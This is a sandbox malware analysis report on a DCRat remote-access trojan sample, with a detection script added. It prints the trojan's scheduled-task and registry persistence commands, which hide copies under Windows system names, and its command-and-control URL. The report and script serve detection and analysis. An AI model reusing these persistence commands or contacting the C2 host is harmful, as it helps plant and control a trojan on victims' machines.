

Windows Analysis Report
SPISOK_DENEG.exe

Overview

General Information

Sample name: SPISOK_DENEG.exe
Analysis ID: 1590008
MD5: 490aa1e56fab47858d780a9fdbafb5bf
SHA1: 337d8c93caf41a62f0720ae1f0c02d262ac0a274
SHA256: 595fab3363e5c90ecf3f7375a0b82d996c96b6a0307ad31e6d79dde07eeb8595
Tags: DCRat, exe, NyashTeam, user-MalHunter3

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SPISOK_DENEG.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\SPISOK_DENEG.exe" MD5: 490AA1E56FAB47858D780A9FDBAFB5BF)
    • wscript.exe (PID: 7620 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7712 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProviderserverruntimeperfSvc\wnVkTofZircZrFhWJh5AKDNhgeSRpsYNieNXBbC85wZu.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ChainPortsurrogate.exe (PID: 7768 cmdline: "C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe" MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
          • schtasks.exe (PID: 7828 cmdline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7852 cmdline: schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7876 cmdline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 6 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 7912 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 7980 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FF6.tmp" "c:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 8024 cmdline: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8048 cmdline: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • Conhost.exe (PID: 3332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 8072 cmdline: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8096 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8120 cmdline: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8144 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8168 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6456 cmdline: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7264 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5764 cmdline: schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZE" /sc MINUTE /mo 12 /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7360 cmdline: schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZ" /sc ONLOGON /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3736 cmdline: schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZE" /sc MINUTE /mo 8 /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • Conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 1780 cmdline: schtasks.exe /create /tn "ChainPortsurrogateC" /sc MINUTE /mo 14 /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 2188 cmdline: schtasks.exe /create /tn "ChainPortsurrogate" /sc ONLOGON /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5472 cmdline: schtasks.exe /create /tn "ChainPortsurrogateC" /sc MINUTE /mo 10 /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 1748 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e6UaCnhMlp.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • Conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7616 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 7376 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • ChainPortsurrogate.exe (PID: 2596 cmdline: "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe" MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
        • Conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ctfmon.exe (PID: 7884 cmdline: C:\ProviderserverruntimeperfSvc\ctfmon.exe MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • ctfmon.exe (PID: 2196 cmdline: C:\ProviderserverruntimeperfSvc\ctfmon.exe MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • dllhost.exe (PID: 5496 cmdline: "C:\Users\Default User\Documents\dllhost.exe" MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • dllhost.exe (PID: 1804 cmdline: "C:\Users\Default User\Documents\dllhost.exe" MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • EbnrVuXczrPqjyiJGoZ.exe (PID: 4180 cmdline: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • EbnrVuXczrPqjyiJGoZ.exe (PID: 4504 cmdline: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • explorer.exe (PID: 1740 cmdline: "C:\Program Files (x86)\jdownloader\config\explorer.exe" MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • explorer.exe (PID: 5568 cmdline: "C:\Program Files (x86)\jdownloader\config\explorer.exe" MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • ChainPortsurrogate.exe (PID: 7736 cmdline: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • ChainPortsurrogate.exe (PID: 7644 cmdline: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe MD5: CE09DB6ADEECA051FF01ABD8CF2E400D)
  • cleanup
{"C2 url": "http://77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn", "MUTEX": "DCR_MUTEX-NVL90ijyTJenukKzbFMD", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
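The schtasks.exe lines in the process tree follow one pattern per dropped copy: a MINUTE trigger, an ONLOGON trigger at /rl HIGHEST, and a second MINUTE trigger at HIGHEST, each pointing at a binary that carries a Windows system name (ctfmon.exe, dllhost.exe, explorer.exe, backgroundTaskHost.exe) but lives outside the directory that name belongs in. The Python below is an added example, not part of the Joe Sandbox report and not DCRat's code: it parses `schtasks /create` command lines like the ones above, flags system-named targets outside their expected directory, HIGHEST run level and short MINUTE intervals, groups tasks by target to surface the ONLOGON+MINUTE pairing, and checks a Winlogon\Shell value for anything appended after explorer.exe (the registry hit later in this report). The expected-directory table and the one benign `NightlyBackup` line are assumptions constructed for the example; the other command lines are copied from the process tree.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Where each Windows binary named in this report legitimately lives (lowercased).
# Assumed allow-list for the example; build yours from a clean baseline image.
EXPECTED_DIR = {
    "ctfmon.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "dllhost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "backgroundtaskhost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "explorer.exe": {r"c:\windows"},
}

_TN = re.compile(r'/tn\s+"([^"]+)"', re.I)
_SC = re.compile(r"/sc\s+(\w+)", re.I)
_MO = re.compile(r"/mo\s+(\d+)", re.I)
_TR = re.compile(r'/tr\s+"([^"]+)"', re.I)
_RL = re.compile(r"/rl\s+highest", re.I)


@dataclass
class TaskCreate:
    name: str                # /tn
    schedule: str            # /sc, upper-cased: MINUTE, ONLOGON, DAILY, ...
    modifier: Optional[int]  # /mo, when present
    target: str              # /tr with the wrapping "'...'" removed
    highest: bool            # /rl HIGHEST present


def parse_schtasks(cmdline: str) -> Optional[TaskCreate]:
    """Parse a `schtasks.exe /create ...` command line; None for anything else."""
    if "/create" not in cmdline.lower():
        return None
    tn, sc, tr = _TN.search(cmdline), _SC.search(cmdline), _TR.search(cmdline)
    if not (tn and sc and tr):
        return None
    mo = _MO.search(cmdline)
    return TaskCreate(
        name=tn.group(1),
        schedule=sc.group(1).upper(),
        modifier=int(mo.group(1)) if mo else None,
        target=tr.group(1).strip().strip("'"),
        highest=bool(_RL.search(cmdline)),
    )


def task_findings(task: TaskCreate) -> List[str]:
    """Reasons to flag one task, mirroring the Sigma-style checks in this report."""
    reasons = []
    directory, _, base = task.target.lower().rpartition("\\")
    expected = EXPECTED_DIR.get(base)
    if expected is not None and directory not in expected:
        reasons.append(f"system-name-outside-expected-dir:{base}")
    if task.highest:
        reasons.append("runlevel-highest")
    if task.schedule == "MINUTE" and task.modifier is not None and task.modifier <= 15:
        reasons.append(f"minute-trigger-every-{task.modifier}")
    return reasons


def redundant_persistence(tasks: List[TaskCreate]) -> Dict[str, List[str]]:
    """Targets registered with both an ONLOGON task and a MINUTE task: the report
    shows one such set per dropped copy, something installers rarely do."""
    by_target: Dict[str, List[TaskCreate]] = {}
    for t in tasks:
        by_target.setdefault(t.target.lower(), []).append(t)
    return {
        target: sorted(t.name for t in group)
        for target, group in by_target.items()
        if {"ONLOGON", "MINUTE"} <= {t.schedule for t in group}
    }


def winlogon_shell_extras(value: str) -> List[str]:
    r"""Entries in HKLM\...\Winlogon\Shell other than explorer.exe; the value is a
    comma-separated list and the implant appends its ctfmon.exe copy to it."""
    entries = [e.strip().strip('"') for e in value.split(",")]
    return [e for e in entries if e and e.lower() != "explorer.exe"]


# Constructed input: a subset of the schtasks lines from the process tree above,
# plus one made-up benign line (NightlyBackup) that must come back clean.
SAMPLE_CMDLINES = [
    r'''schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /f''',
    r'''schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /f''',
    r'''schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /f''',
    r'''schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Program Files\Backup\backup.exe" /f''',
]


def scan(cmdlines: List[str]) -> Dict[str, object]:
    """Per-task findings plus the targets that show the ONLOGON+MINUTE pairing."""
    tasks = [t for t in map(parse_schtasks, cmdlines) if t is not None]
    return {
        "tasks": [(t.name, t.target, task_findings(t)) for t in tasks],
        "redundant": redundant_persistence(tasks),
    }


if __name__ == "__main__":
    result = scan(SAMPLE_CMDLINES)
    for name, target, reasons in result["tasks"]:
        print("FLAG" if reasons else "ok  ", name, target, reasons)
    print("ONLOGON+MINUTE pairs:", result["redundant"])
```

Feed it the `CommandLine` field of Sysmon event 1 or Security 4688 records where the image is schtasks.exe; the directory table is the part that needs tuning, since a name like explorer.exe has exactly one legitimate home while most others have two (System32 and SysWOW64).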
Source | Rule | Description | Author
SPISOK_DENEG.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
C:\ProviderserverruntimeperfSvc\ctfmon.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
C:\Windows\debug\backgroundTaskHost.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
C:\Users\Default\Documents\dllhost.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

Source | Rule | Description | Author
00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000000.00000003.1671665408.000000000674F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000000.00000003.1672343604.0000000007053000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000004.00000000.1740538783.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Process Memory Space: SPISOK_DENEG.exe PID: 7576 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

Source | Rule | Description | Author
0.3.SPISOK_DENEG.exe.679d6f4.0.raw.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
0.3.SPISOK_DENEG.exe.70a16f4.1.raw.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
0.3.SPISOK_DENEG.exe.679d6f4.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
4.0.ChainPortsurrogate.exe.ea0000.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
0.3.SPISOK_DENEG.exe.70a16f4.1.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Users\Default User\Documents\dllhost.exe", CommandLine: "C:\Users\Default User\Documents\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\Documents\dllhost.exe, NewProcessName: C:\Users\Default\Documents\dllhost.exe, OriginalFileName: C:\Users\Default\Documents\dllhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Users\Default User\Documents\dllhost.exe", ProcessId: 5496, ProcessName: dllhost.exe
Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, ProcessId: 7768, TargetFilename: C:\Windows\debug\backgroundTaskHost.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Users\Default User\Documents\dllhost.exe", CommandLine: "C:\Users\Default User\Documents\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\Documents\dllhost.exe, NewProcessName: C:\Users\Default\Documents\dllhost.exe, OriginalFileName: C:\Users\Default\Documents\dllhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Users\Default User\Documents\dllhost.exe", ProcessId: 5496, ProcessName: dllhost.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\ProviderserverruntimeperfSvc\ctfmon.exe", EventID: 13, EventType: SetValue, Image: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, ProcessId: 7768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: explorer.exe, "C:\ProviderserverruntimeperfSvc\ctfmon.exe", EventID: 13, EventType: SetValue, Image: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, ProcessId: 7768, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe", ParentImage: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, ParentProcessId: 7768, ParentProcessName: ChainPortsurrogate.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline", ProcessId: 7912, ProcessName: csc.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\SPISOK_DENEG.exe", ParentImage: C:\Users\user\Desktop\SPISOK_DENEG.exe, ParentProcessId: 7576, ParentProcessName: SPISOK_DENEG.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe" , ProcessId: 7620, ProcessName: wscript.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, ProcessId: 7768, TargetFilename: C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe", ParentImage: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, ParentProcessId: 7768, ParentProcessName: ChainPortsurrogate.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline", ProcessId: 7912, ProcessName: csc.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /f, CommandLine: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe", ParentImage: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, ParentProcessId: 7768, ParentProcessName: ChainPortsurrogate.exe, ProcessCommandLine: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /f, ProcessId: 8096, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-13T13:26:33.309955+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.16.1 | 80 | TCP
2025-01-13T13:26:44.466245+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 104.21.16.1 | 80 | TCP
2025-01-13T13:26:49.310116+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 104.21.16.1 | 80 | TCP
2025-01-13T13:26:52.200683+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 104.21.16.1 | 80 | TCP
2025-01-13T13:26:55.607858+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 104.21.16.1 | 80 | TCP
2025-01-13T13:27:13.763281+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49827 | 104.21.16.1 | 80 | TCP
2025-01-13T13:27:21.935238+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49880 | 104.21.16.1 | 80 | TCP
2025-01-13T13:27:24.482302+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49897 | 104.21.16.1 | 80 | TCP
2025-01-13T13:27:28.654062+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49926 | 104.21.16.1 | 80 | TCP
2025-01-13T13:27:46.201101+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50012 | 104.21.16.1 | 80 | TCP
2025-01-13T13:27:54.216801+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50013 | 104.21.16.1 | 80 | TCP
2025-01-13T13:27:56.763749+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50014 | 104.21.16.1 | 80 | TCP
2025-01-13T13:28:02.748384+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50015 | 104.21.16.1 | 80 | TCP
2025-01-13T13:28:05.513787+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50016 | 104.21.16.1 | 80 | TCP
2025-01-13T13:28:07.654435+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50017 | 104.21.16.1 | 80 | TCP


AV Detection

Source: SPISOK_DENEG.exe; Avira: detected
